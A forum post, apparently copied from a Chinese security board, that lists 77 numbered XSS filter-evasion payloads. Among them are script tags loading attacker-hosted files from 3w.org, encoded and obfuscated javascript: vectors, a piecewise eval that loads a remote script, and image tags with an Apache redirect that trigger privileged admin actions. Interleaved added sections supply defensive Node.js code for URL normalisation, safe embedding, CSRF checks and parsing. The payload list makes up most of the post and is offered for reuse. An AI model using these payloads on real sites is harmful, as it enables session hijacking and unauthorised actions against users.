It seems t00ls has rather little material on XSS; I saw some good stuff and copied it over, in case any of you want to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript directive
<IMG SRC="javascript:alert('XSS');">
(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML entities (the semicolon is required here)
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) String.fromCharCode (use an encoder to compute the character codes)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) Decimal (UTF-8 Unicode) entity encoding (use an encoder)
<IMG SRC=jav...omitted...S')>
(9) Zero-padded decimal entity encoding, up to 7 digits per character, without semicolons (use an encoder)
<IMG SRC=jav...omitted...S')>
(10) Hex entity encoding, also without semicolons (use an encoder)
<IMG SRC=java...omitted...XSS')>
(11) Embedded tab, breaking up the JavaScript keyword
<IMG SRC="jav	ascript:alert('XSS');">
(12) Embedded encoded tab, breaking up the JavaScript keyword
<IMG SRC="jav&#x09;ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
(15) Multi-line injected JavaScript, with a carriage return after every character; an extreme form of the vectors above (shown here collapsed onto one line)
<IMG SRC="javascript:alert('XSS')">
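Vectors (4) to (14) all work against filters that look for the literal string "javascript:" in the raw attribute. The browser never sees the raw attribute: the HTML parser decodes character references first (numeric ones with or without a semicolon), then the URL parser throws away tab, newline and carriage return, trims leading control characters and lowercases the scheme. The following is an added example, not part of the original post, that applies the same two steps before deciding whether a value is a javascript: URL and compares that with the naive keyword check. It runs under Node.js with no dependencies; the sample values are constructed from the vectors above, and the named-entity table is deliberately short (a real decoder carries the full HTML entity list).

```javascript
// Added example: normalise an attribute value the way an HTML parser plus a
// URL parser do, then check the scheme. Shows why /javascript:/i on the raw
// value misses vectors (5), (9)-(14) and flags harmless text.
const NAMED_REFS = { quot: '"', amp: '&', lt: '<', gt: '>', apos: "'", tab: '\t', newline: '\n' };

// Decode HTML character references. Numeric refs (&#106; &#x6A; zero-padded)
// are accepted with or without the trailing semicolon, as browsers do in
// attribute values. Assumption: only the named refs above are needed here.
function htmlDecode(s) {
  return s.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex !== undefined || dec !== undefined) {
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    }
    const v = NAMED_REFS[name.toLowerCase()];
    return v === undefined ? m : v;
  });
}

// URL-parser view of the value: remove ASCII tab/LF/CR anywhere, trim leading
// and trailing C0 controls and spaces, read the scheme case-insensitively.
function urlScheme(s) {
  const cleaned = s.replace(/[\t\n\r]/g, '').replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

const DANGEROUS_SCHEMES = new Set(['javascript', 'vbscript', 'data']);

// What a naive filter does: search the raw value for the keyword.
function naiveIsDangerous(raw) {
  return /javascript:|vbscript:/i.test(raw);
}

// What the browser effectively does: decode, parse, then compare the scheme.
function isDangerousUrl(raw) {
  const scheme = urlScheme(htmlDecode(raw));
  return scheme !== null && DANGEROUS_SCHEMES.has(scheme);
}

// Constructed sample attribute values, as they would sit in the page source.
const SAMPLES = {
  plain: "javascript:alert('XSS')",
  mixedCase: "JaVaScRiPt:alert('XSS')",
  entities: 'javascript:alert(&quot;XSS&quot;)',
  decimalNoSemi: '&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58alert(1)',
  tab: "jav\tascript:alert('XSS');",
  encodedTab: "jav&#x09;ascript:alert('XSS');",
  encodedNewline: "jav&#x0A;ascript:alert('XSS');",
  leadingControl: " &#14;  javascript:alert('XSS');",
  benign: 'http://example.com/javascript:notascheme',
};

// Side-by-side verdicts for every sample.
function report() {
  const out = {};
  for (const [name, value] of Object.entries(SAMPLES)) {
    out[name] = { naive: naiveIsDangerous(value), real: isDangerousUrl(value) };
  }
  return out;
}

console.log(report());
```

The naive check says "safe" for the tab, encoded-tab, newline and decimal-without-semicolon samples and "dangerous" for the benign URL that merely contains the word; the decoded-then-parsed check gets all of them right. In a browser or Node, `new URL(htmlDecode(value)).protocol` performs the same stripping and lowercasing as `urlScheme` above, which is the cheapest way to get this right in production.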
(16) Working around a length limit (all pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2 (null bytes are basically ineffective domestically, since there is nowhere they can be exploited)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and some other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2 (protocol-relative URL)
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escape: when the filter backslash-escapes your quotes, escape its backslash
\";alert('XSS');//
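Vector (29) targets a page that drops user input into a JavaScript string literal and "protects" it by putting a backslash in front of every double quote. The payload's own backslash swallows that escape, the string ends early, and the rest of the input runs as code. The following is an added example, not from the original post, that shows the vulnerable template next to a hardened one and actually executes the generated script (with alert and sink stubbed) so the outcome can be inspected offline. It runs under Node.js with no dependencies; the template text and the function names naiveEmbed/safeEmbed/sink are assumptions made for the demo.

```javascript
// Added example: a JS-string-literal injection and its fix, run end to end.

// Vulnerable template: escapes the quote but not the backslash before it.
function naiveEmbed(input) {
  const escaped = input.replace(/"/g, '\\"');
  return 'var name = "' + escaped + '"; sink(name);';
}

// Hardened template: JSON.stringify escapes backslashes and quotes in the
// right order. The extra replacements keep the literal from containing a
// "</script" sequence (which would end the script element regardless of JS
// quoting) or a raw U+2028/U+2029, which older engines treated as line breaks.
function safeEmbed(input) {
  const literal = JSON.stringify(input)
    .replace(/</g, '\\u003c')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  return 'var name = ' + literal + '; sink(name);';
}

// Execute a generated script with stubbed alert() and sink(); record what ran.
function run(script) {
  const calls = { alert: [], sink: [] };
  const fn = new Function('alert', 'sink', script);
  fn((x) => calls.alert.push(String(x)), (x) => calls.sink.push(x));
  return calls;
}

// Constructed input: the payload from vector (29), i.e. \";alert('XSS');//
const PAYLOAD = "\\\";alert('XSS');//";

function demo() {
  return {
    naiveScript: naiveEmbed(PAYLOAD),            // var name = "\\";alert('XSS');//"; sink(name);
    naive: run(naiveEmbed(PAYLOAD)),             // alert fires, sink never called
    safe: run(safeEmbed(PAYLOAD)),               // sink gets the payload as data
    closingTag: safeEmbed('</script><script>alert(1)</script>'),
  };
}

console.log(demo());
```

In the naive output the literal `"\\"` is a complete string (one backslash), so `;alert('XSS');` executes and `//"; sink(name);` becomes a comment. The hardened output keeps the whole payload inside the literal and `sink` receives it unchanged; the `</script>` sample shows the other hole JSON.stringify alone leaves open.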
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY ONLOAD=alert('XSS')>
(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META refresh with an extra URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with an extra character inserted in front of the javascript: directive (any of code points 1-32, 34, 39, 160, 8192-8.13, 12288, 65279 works)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute with the expression keyword split by a comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
(50) Anonymous tag with a STYLE attribute (anything that starts with an open angle bracket and a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE with expression (only this fragment survives here)
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) ActionScript inside the Flash file can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);
(57) XML namespace; the .htc file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If the filter blocks your .js, put the JavaScript in a file with an image name and point SRC at it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command: the victim's browser fetches the URL with the victim's cookies attached, so whatever the site does on that GET request is done as the victim
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command 2 (a.jpg on the same server as the attacker page): an Apache redirect turns the innocent-looking image URL into the privileged request
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
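Vectors (59) and (60) are not script injection at all: the image tag simply makes the victim's browser issue a GET that carries their session cookie. The defence is on the server: never change state on GET or HEAD, and for other methods verify that the request originated from your own site. The following is an added example, not from the original post, of that check in Node.js with no dependencies. The request objects are constructed by hand; the header names are the real ones browsers send (Sec-Fetch-Site, Sec-Fetch-Dest, Origin). The origin value, the CSRF token in the body, and the single-origin layout of the application are assumptions made for the demo.

```javascript
// Added example: server-side gate for state-changing requests, written
// against the requests that <IMG SRC=...> and a cross-site form produce.

const SITE_ORIGIN = 'https://www.example.com'; // assumption: our own origin

// Returns a rejection reason, or null when the request may change state.
function rejectStateChange(req, expectedCsrfToken) {
  const h = {};
  for (const [k, v] of Object.entries(req.headers)) h[k.toLowerCase()] = v;

  // 1. GET/HEAD are exactly what <img>, <link>, <iframe> and a 302 can trigger.
  if (req.method === 'GET' || req.method === 'HEAD') {
    return 'state change over ' + req.method + ' (reachable via <IMG SRC>)';
  }
  // 2. Fetch metadata, when present, names the initiator's site. Only
  //    same-origin (or direct navigation, "none") is accepted; assumption:
  //    no subdomains, otherwise "same-site" would need a decision too.
  const site = h['sec-fetch-site'];
  if (site !== undefined && site !== 'same-origin' && site !== 'none') {
    return 'Sec-Fetch-Site=' + site;
  }
  if (h['sec-fetch-dest'] === 'image') return 'image request cannot change state';
  // 3. Origin must match ours. Browsers always send Origin on POST.
  if (h['origin'] !== SITE_ORIGIN) return 'Origin mismatch: ' + h['origin'];
  // 4. Per-session anti-CSRF token (assumption: the app puts it in the body).
  if (!req.body || req.body.csrf !== expectedCsrfToken) return 'missing or wrong CSRF token';
  return null;
}

// Constructed requests. IMG_TRIGGERED is what the browser sends for
// <IMG SRC="http://www.XXX.com/admin.asp&deleteuser"> on an attacker's page.
const IMG_TRIGGERED = {
  method: 'GET', url: '/admin.asp&deleteuser',
  headers: { Cookie: 'session=abc', 'Sec-Fetch-Site': 'cross-site', 'Sec-Fetch-Dest': 'image', 'Sec-Fetch-Mode': 'no-cors' },
};
const CROSS_SITE_FORM = {
  method: 'POST', url: '/admin.asp',
  headers: { Cookie: 'session=abc', Origin: 'https://evil.example', 'Sec-Fetch-Site': 'cross-site', 'Sec-Fetch-Dest': 'document' },
  body: { action: 'deleteuser' },
};
// An older browser without Fetch Metadata still sends Origin on POST.
const OLD_BROWSER_CROSS_SITE = {
  method: 'POST', url: '/admin.asp',
  headers: { Cookie: 'session=abc', Origin: 'https://evil.example' },
  body: { action: 'deleteuser', csrf: 't0k3n' },
};
const LEGIT = {
  method: 'POST', url: '/admin.asp',
  headers: { Cookie: 'session=abc', Origin: SITE_ORIGIN, 'Sec-Fetch-Site': 'same-origin', 'Sec-Fetch-Dest': 'empty' },
  body: { action: 'deleteuser', csrf: 't0k3n' },
};

console.log(rejectStateChange(IMG_TRIGGERED, 't0k3n'));
console.log(rejectStateChange(LEGIT, 't0k3n'));
```

The image-triggered request is refused at the first check regardless of anything else, which is the property that matters: once admin actions no longer happen on GET, vectors (59) and (60) have nothing to call.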
(61) Getting around symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
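Vectors (61) to (66) beat filters that assume a tag ends at the first ">". Inside a quoted attribute value ">" is ordinary data, so a browser reads past it and finds the SRC attribute that the filter never saw. The following is an added example, not from the original post, with a first-">" scanner beside a small attribute tokenizer that follows the HTML tokenizer's rules for quoted, unquoted and malformed attributes. Node.js, no dependencies; the vector strings are constructed from the list above. Backticks are not quote characters in HTML, so (65) only ever worked in old Internet Explorer, and (62) ends the tag at its first ">" under current parsing rules; both are handled here the way a current browser handles them.

```javascript
// Added example: why quoted ">" defeats a first-">" tag scanner.

// Naive scanner: the tag is everything up to the first ">".
function scriptSrcNaive(html) {
  const m = /<script([^>]*)>/i.exec(html);
  if (!m) return null;
  const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
  return src ? src[1] : null;
}

// Tokenizer-faithful attribute parser, starting right after "<script".
function parseAttributes(html, pos) {
  const attrs = [];
  const n = html.length;
  const isSpace = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\r' || c === '\f';
  while (pos < n) {
    while (pos < n && (isSpace(html[pos]) || html[pos] === '/')) pos++;
    if (pos >= n || html[pos] === '>') return { attrs, end: pos };
    // Attribute name runs until whitespace, "/", "=" or ">". A leading "="
    // becomes part of the name, as in the spec's parse-error recovery.
    let name = '';
    if (html[pos] === '=') { name = '='; pos++; }
    while (pos < n && !isSpace(html[pos]) && html[pos] !== '/' && html[pos] !== '=' && html[pos] !== '>') name += html[pos++];
    while (pos < n && isSpace(html[pos])) pos++;
    let value = '';
    if (html[pos] === '=') {
      pos++;
      while (pos < n && isSpace(html[pos])) pos++;
      const q = html[pos];
      if (q === '"' || q === "'") {                       // quoted: ">" is data
        pos++;
        while (pos < n && html[pos] !== q) value += html[pos++];
        pos++;                                             // closing quote
      } else {                                             // unquoted: ends at space or ">"
        while (pos < n && !isSpace(html[pos]) && html[pos] !== '>') value += html[pos++];
      }
    }
    attrs.push({ name: name.toLowerCase(), value });
  }
  return { attrs, end: pos };
}

function scriptSrcTokenized(html) {
  const m = /<script(?=[\s/>])/i.exec(html);
  if (!m) return null;
  const { attrs } = parseAttributes(html, m.index + m[0].length);
  const src = attrs.find((a) => a.name === 'src');
  return src ? src.value : null;
}

// Constructed samples: the vectors from the list above.
const VECTORS = {
  v61: '<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>',
  v62: '<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>',      // tag ends at first ">" today
  v63: '<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>',
  v64: '<SCRIPT "a=\'>\'" SRC="http://3w.org/xss.js"></SCRIPT>',
  v66: '<SCRIPT a=">\'>" SRC="http://3w.org/xss.js"></SCRIPT>',
  plain: '<script src=http://3w.org/xss.js></script>',
};

function compare() {
  const out = {};
  for (const [k, v] of Object.entries(VECTORS)) {
    out[k] = { naive: scriptSrcNaive(v), tokenized: scriptSrcTokenized(v) };
  }
  return out;
}

console.log(compare());
```

For (61), (63), (64) and (66) the naive scanner reports no SRC while the tokenizer returns http://3w.org/xss.js, which is what the browser will load. The practical lesson is the usual one: filter on a parsed DOM (or serialise through a real HTML parser), never on regexes over the raw markup.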
(68) URL evasion: IP address instead of hostname
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>
(70) Dword (decimal) IP
<A HREF="http://3232235521">XSS</A>
(71) Hex IP
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) Octal IP
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding: a newline and tabs inside the scheme and host, plus decimal, octal and hex octets
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>
(74) Omitting the http: (protocol-relative URL)
<A HREF="//www.google.com/">XSS</A>
(75) Omitting the www
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS name with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
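Vectors (68) to (76) all point at the same place; they only look different to a filter that compares raw href strings. The browser's URL parser strips tabs and newlines, decodes percent-encoding in the host, drops the trailing dot, and folds every numeric form (decimal dword, 0x hex, leading-0 octal, and mixtures with fewer than four parts) into one IPv4 address. The following is an added example, not from the original post, that implements those WHATWG IPv4 number rules in full (the general algorithm of which (70) to (73) are instances) and applies them before an allow-list check. Node.js, no dependencies; the allow-list, the default scheme for protocol-relative links and the link strings are assumptions constructed for the demo, and IPv6 hosts are not handled.

```javascript
// Added example: canonicalise link hosts the way the URL parser does before
// comparing them against an allow-list.

// WHATWG "IPv4 number parser": "0x" hex, leading-0 octal, else decimal.
function parseIPv4Number(part) {
  if (part === '') return NaN;
  let radix = 10;
  if (/^0x/i.test(part)) { part = part.slice(2); radix = 16; }
  else if (part.length >= 2 && part[0] === '0') { part = part.slice(1); radix = 8; }
  if (part === '') return 0;                         // "0x" alone is zero
  const digits = { 8: /^[0-7]+$/, 10: /^[0-9]+$/, 16: /^[0-9a-f]+$/i }[radix];
  return digits.test(part) ? parseInt(part, radix) : NaN;
}

// Dotted-quad for an IPv4 literal in any of the accepted forms, else null.
function parseIPv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();
  if (parts.length > 4) return null;
  const nums = parts.map(parseIPv4Number);
  if (nums.some(Number.isNaN)) return null;          // not numeric: a domain
  const last = nums[nums.length - 1];
  if (nums.slice(0, -1).some((x) => x > 255)) return null;
  if (last >= 256 ** (5 - nums.length)) return null; // last part fills the rest
  let v = last;
  nums.slice(0, -1).forEach((x, i) => { v += x * 256 ** (3 - i); });
  return [v >>> 24, (v >>> 16) & 255, (v >>> 8) & 255, v & 255].join('.');
}

// Scheme and canonical host for an href. Tab/LF/CR are removed, leading and
// trailing controls trimmed, "//" inherits http (assumption: the page's
// scheme), userinfo and port are dropped, percent-encoding is decoded, the
// host is lowercased, a trailing dot removed, and IPv4 literals resolved.
function canonicalHost(href) {
  const s = href.replace(/[\t\n\r]/g, '').replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
  const m = /^(?:([a-z][a-z0-9+.-]*):)?\/\/([^/?#]*)/i.exec(s);
  if (!m) {
    const sm = /^([a-z][a-z0-9+.-]*):/i.exec(s);
    return { scheme: sm ? sm[1].toLowerCase() : null, host: null };
  }
  let host = m[2].replace(/^.*@/, '').replace(/:\d*$/, '');
  try { host = decodeURIComponent(host); } catch (e) { /* keep as is */ }
  host = host.toLowerCase().replace(/\.$/, '');
  return { scheme: m[1] ? m[1].toLowerCase() : 'http', host: parseIPv4(host) || host };
}

const ALLOWED_HOSTS = new Set(['www.google.com', 'google.com']); // assumption
const SAFE_SCHEMES = new Set(['http', 'https']);

function linkAllowed(href) {
  const { scheme, host } = canonicalHost(href);
  return SAFE_SCHEMES.has(scheme) && host !== null && ALLOWED_HOSTS.has(host);
}

// Constructed links from vectors (68)-(77).
const LINKS = [
  'http://127.0.0.1/', 'http://%33%77%2E%6F%72%67', 'http://3232235521',
  'http://0xc0.0xa8.0x00.0x01', 'http://0300.0250.0000.0001',
  'h\ntt\tp://6\t6.000146.0x7.147/', '//www.google.com/', 'http://google.com/',
  'http://www.google.com./', "javascript:document.location='http://www.google.com/'",
];
console.log(LINKS.map((l) => [l, canonicalHost(l), linkAllowed(l)]));
```

The three numeric forms in (70) to (72) all canonicalise to 192.168.0.1 and the mixed form in (73) to 66.102.7.147, so an allow-list or block-list compares real destinations rather than spellings. In a browser or Node, `new URL(href, base).hostname` produces the same canonical host, and is what to use in production; the hand-written parser here only makes the rules visible.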
Original source: http://fuzzexp.org/u/0day/?p=145